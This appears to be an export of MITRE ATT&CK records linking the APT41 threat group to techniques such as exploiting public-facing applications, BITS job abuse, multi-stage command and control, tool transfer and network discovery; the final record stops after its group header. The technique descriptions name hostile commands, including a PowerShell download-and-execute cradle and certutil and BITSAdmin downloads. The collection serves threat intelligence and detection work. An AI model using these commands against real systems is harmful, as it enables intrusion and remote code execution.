external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--e7fc5a89-f5a7-432f-a885-6b9532153e7e
revoked : False
technique : Exploit Public-Facing Application
technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1190
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--d316289b-26fa-49d7-8ed0-3fa56cc858b7
revoked : False
technique : BITS Jobs
technique_description : Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1197
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Service: Service Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--f234930f-f7d1-458d-8c79-c73538990f97
revoked : False
technique : Multi-Stage Channels
technique_description : Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1104
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--b42c23c9-99f4-4b1f-91e2-a945a119fe98
revoked : False
technique : Ingress Tool Transfer
technique_description : Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 

On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)

Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1105
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--f1a9d2b9-f5ec-4119-b3b5-8b46085c01b5
revoked : False
technique : Obfuscated Files or Information
technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1027
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f
relationship_description :  [APT41](https://attack.mitre.org/groups/G0096) used the <code>net share</code> command as part of network reconnaissance.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--4f6e677d-427b-4342-b35c-57f4f3ad4ff8
revoked : False
technique : Network Share Discovery
technique_description : Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 

File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1135
matrix : mitre-attack
platform : ['macOS', 'Windows', 'Linux']
data_sources : ['Process: OS API Execution', 'Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has enumerated IP addresses of network resources and used the <code>netstat</code> command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--a70bd01d-1d79-44e7-afe4-3a83e5a8d70c
revoked : False
technique : System Network Connections Discovery
technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1049
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']
data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

